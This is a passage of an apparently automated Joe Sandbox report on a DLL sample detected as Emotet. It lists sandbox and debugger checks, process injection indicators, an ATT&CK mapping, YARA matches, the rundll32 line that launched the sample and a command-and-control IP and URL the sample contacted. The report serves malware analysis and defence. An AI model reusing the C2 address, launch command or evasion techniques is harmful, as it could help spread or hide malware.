                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exe TID: 2460Thread sleep time: -120000s >= -30000s
                      Source: C:\Windows\System32\svchost.exeProcess information queried: ProcessInformation
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7C0927 FindFirstFileExW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E7C0927 FindFirstFileExW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00ECE2C8 FindFirstFileW,
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: Amcache.hve.17.drBinary or memory string: VMware
                      Source: Amcache.hve.17.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                      Source: Amcache.hve.17.drBinary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                      Source: Amcache.hve.17.drBinary or memory string: VMware Virtual USB Mouse
                      Source: Amcache.hve.17.drBinary or memory string: VMware-42 35 9c fb 73 fa 4e 1b-fb a4 60 e7 7b e5 4a ed
                      Source: Amcache.hve.17.drBinary or memory string: VMware, Inc.
                      Source: Amcache.hve.17.drBinary or memory string: VMware Virtual disk SCSI Disk Devicehbin
                      Source: Amcache.hve.17.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.17.drBinary or memory string: VMware7,1
                      Source: Amcache.hve.17.drBinary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.17.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: Amcache.hve.17.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: WerFault.exe, 00000014.00000003.986775578.00000000048FB000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000002.988850293.00000000048FE000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000002.988815498.00000000048D0000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000002.1174922898.00000151084D2000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000002.1174714591.0000015108489000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000002.1175003928.00000151084EB000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: Amcache.hve.17.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.17.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.17.drBinary or memory string: VMware, Inc.me
                      Source: Amcache.hve.17.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                      Source: Amcache.hve.17.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7C0326 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7AE690 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,CreateMutexA,CloseHandle,ReleaseMutex,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7A1290 GetProcessHeap,HeapAlloc,HeapFree,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7B9990 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7BEC0B mov ecx, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7C02CC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7B9920 mov esi, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7B9920 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E7B9990 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E7BEC0B mov ecx, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E7C02CC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E7B9920 mov esi, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E7B9920 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_010307D2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003C07D2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005D07D2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010C07D2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EC07D2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPort
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPort
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7BA462 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7C0326 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7BAB0C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E7BA462 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E7C0326 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E7BAB0C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 45.63.5.129 187
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\IGidwJjoUs.dll",#1
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 6888 -ip 6888
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6888 -s 308
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6888 -ip 6888
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6888 -s 304
                      Source: loaddll32.exe, 00000000.00000000.958967461.0000000001770000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.957163784.0000000001770000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.939113865.0000000001770000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.940086206.0000000001770000.00000002.00020000.sdmp, rundll32.exe, 00000017.00000002.1185190253.00000000036C0000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: loaddll32.exe, 00000000.00000000.958967461.0000000001770000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.957163784.0000000001770000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.939113865.0000000001770000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.940086206.0000000001770000.00000002.00020000.sdmp, rundll32.exe, 00000017.00000002.1185190253.00000000036C0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000000.00000000.958967461.0000000001770000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.957163784.0000000001770000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.939113865.0000000001770000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.940086206.0000000001770000.00000002.00020000.sdmp, rundll32.exe, 00000017.00000002.1185190253.00000000036C0000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: loaddll32.exe, 00000000.00000000.958967461.0000000001770000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.957163784.0000000001770000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.939113865.0000000001770000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.940086206.0000000001770000.00000002.00020000.sdmp, rundll32.exe, 00000017.00000002.1185190253.00000000036C0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7BA584 cpuid
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7BA755 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
                      Source: Amcache.hve.17.drBinary or memory string: c:\program files\windows defender\msmpeng.exe

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 12.2.rundll32.exe.10b0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.1020000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1170000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1170000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.1170000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1203908.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.dd3740.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.3b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1203908.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1203908.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.1203908.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1170000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.rundll32.exe.eb0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.dd3740.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1203908.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1203908.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1170000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1170000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.a02240.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.10e34a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.540000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1170000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.rundll32.exe.eb0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.540000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1203908.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.1203908.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1170000.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1203908.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.1020000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.a02240.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.1170000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.10b0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.3b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.972240.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.972240.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.10e34a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1170000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1203908.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.913568790.0000000001020000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.939956990.0000000001170000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.930364249.00000000003B0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.913622906.00000000010CA000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.958610660.0000000001170000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.958778791.00000000011EB000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.939332319.00000000005C0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.939371192.000000000095A000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.1030937060.0000000000DBA000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.989427479.00000000011EB000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.930427759.00000000009EA000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.904116541.00000000006AB000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.1031053353.00000000010B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.989393299.0000000001170000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000003.1139622922.0000000000FAB000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.914845954.0000000000540000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.940009942.00000000011EB000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.956837036.0000000001170000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.939031365.00000000011EB000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.1183917294.0000000000EB0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.956978658.00000000011EB000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.938967752.0000000001170000.00000040.00000010.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsNative API1Path InterceptionProcess Injection112Masquerading2OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion2LSASS MemoryQuery Registry1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection112Security Account ManagerSecurity Software Discovery41SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSVirtualization/Sandbox Evasion2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol2SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptHidden Files and Directories1LSA SecretsProcess Discovery3SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information2Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsRundll321DCSyncFile and Directory Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobFile Deletion1Proc FilesystemSystem Information Discovery24Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 532314 Sample: IGidwJjoUs Startdate: 02/12/2021 Architecture: WINDOWS Score: 84 50 Sigma detected: Emotet RunDLL32 Process Creation 2->50 52 Multi AV Scanner detection for submitted file 2->52 54 Yara detected Emotet 2->54 8 loaddll32.exe 1 2->8         started        10 svchost.exe 3 8 2->10         started        12 svchost.exe 2->12         started        15 3 other processes 2->15 process3 dnsIp4 17 rundll32.exe 2 8->17         started        20 cmd.exe 1 8->20         started        22 rundll32.exe 8->22         started        28 3 other processes 8->28 24 WerFault.exe 10->24         started        26 WerFault.exe 10->26         started        46 192.168.2.1 unknown unknown 12->46 process5 signatures6 48 Hides that the sample has been downloaded from the Internet (zone.identifier) 17->48 30 rundll32.exe 17->30         started        32 rundll32.exe 20->32         started        34 rundll32.exe 22->34         started        36 rundll32.exe 28->36         started        process7 process8 38 rundll32.exe 30->38         started        42 rundll32.exe 32->42         started        dnsIp9 44 45.63.5.129, 443, 49794 AS-CHOOPAUS United States 38->44 56 System process connects to network (likely due to code injection or exploit) 38->56 signatures10

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      IGidwJjoUs.dll18%VirustotalBrowse
                      IGidwJjoUs.dll18%ReversingLabsWin32.Infostealer.Convagent

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      0.2.loaddll32.exe.1170000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      3.2.rundll32.exe.1020000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      0.0.loaddll32.exe.1170000.3.unpack100%AviraHEUR/AGEN.1110387Download File
                      0.0.loaddll32.exe.1170000.9.unpack100%AviraHEUR/AGEN.1110387Download File
                      12.2.rundll32.exe.10b0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      0.0.loaddll32.exe.1170000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      7.2.rundll32.exe.5c0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      0.0.loaddll32.exe.1170000.6.unpack100%AviraHEUR/AGEN.1110387Download File
                      2.2.rundll32.exe.540000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      23.2.rundll32.exe.eb0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      6.2.rundll32.exe.3b0000.0.unpack100%AviraHEUR/AGEN.1110387Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://www.disneyplus.com/legal/your-california-privacy-rights0%URL Reputationsafe
                      http://crl.ver)0%Avira URL Cloudsafe
                      https://www.disneyplus.com/legal/privacy-policy0%URL Reputationsafe
                      https://45.63.5.129/vIcMmPpXrabVVBXOJgaOKuPeOcCKPXUIh0%Avira URL Cloudsafe
                      https://www.tiktok.com/legal/report/feedback0%URL Reputationsafe
                      http://help.disneyplus.com.0%URL Reputationsafe
                      https://disneyplus.com/legal.0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://45.63.5.129/vIcMmPpXrabVVBXOJgaOKuPeOcCKPXUIhtrue
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://www.disneyplus.com/legal/your-california-privacy-rightssvchost.exe, 0000001F.00000003.1150795758.0000015108B8F000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.1150829061.0000015108BD0000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://crl.ver)svchost.exe, 0000001F.00000002.1175003928.00000151084EB000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
                      https://www.disneyplus.com/legal/privacy-policysvchost.exe, 0000001F.00000003.1150795758.0000015108B8F000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.1150829061.0000015108BD0000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://upx.sf.netAmcache.hve.17.drfalse
                        		high
                        https://www.tiktok.com/legal/report/feedbacksvchost.exe, 0000001F.00000003.1153314663.0000015108B7E000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.1153380650.0000015109002000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.1153337846.0000015108B8F000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.1153407395.0000015108B7E000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://help.disneyplus.com.svchost.exe, 0000001F.00000003.1150795758.0000015108B8F000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.1150829061.0000015108BD0000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://disneyplus.com/legal.svchost.exe, 0000001F.00000003.1150795758.0000015108B8F000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.1150829061.0000015108BD0000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown

                        Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public

                        IPDomainCountryFlagASNASN NameMalicious
                        45.63.5.129
                        		unknownUnited States
                        		20473AS-CHOOPAUStrue

                        Private

                        IP
                        192.168.2.1

                        General Information

                        Joe Sandbox Version:34.0.0 Boulder Opal
                        Analysis ID:532314
                        Start date:02.12.2021
                        Start time:00:51:12
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 12m 21s
                        Hypervisor based Inspection enabled:false
                        Report type:light
                        Sample file name:IGidwJjoUs (renamed file extension from none to dll)
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:33
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal84.troj.evad.winDLL@36/14@0/2
                        EGA Information:Failed
                        HDC Information:
                        • Successful, ratio: 47.2% (good quality ratio 43.7%)
                        • Quality average: 70.7%
                        • Quality standard deviation: 27.4%
                        HCA Information:
                        • Successful, ratio: 84%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Override analysis time to 240s for rundll32
                        Warnings:
